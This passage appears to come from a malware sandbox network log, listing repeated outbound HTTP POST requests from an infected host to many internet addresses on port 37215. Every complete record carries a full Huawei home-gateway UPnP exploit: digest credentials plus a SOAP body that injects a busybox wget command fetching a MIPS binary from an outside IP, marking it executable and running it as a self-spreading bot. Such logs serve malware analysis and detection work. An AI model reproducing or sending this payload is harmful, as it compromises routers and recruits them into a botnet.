                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1917192.168.2.156026241.191.109.19737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:17.011055946 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1918192.168.2.15518069.246.180.16637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:17.011133909 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1919192.168.2.154959641.230.193.10637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:17.011177063 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1920192.168.2.1551694197.66.175.6337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:17.022344112 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1921192.168.2.155170041.70.149.15137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.020168066 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1922192.168.2.1549068157.252.37.15737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.020175934 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1923192.168.2.1537646197.222.85.19337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.020251036 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1924192.168.2.1543142157.247.82.23637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.020303011 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1925192.168.2.155164041.167.142.10037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.020332098 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1926192.168.2.1538698122.86.79.21137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:18.020387888 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
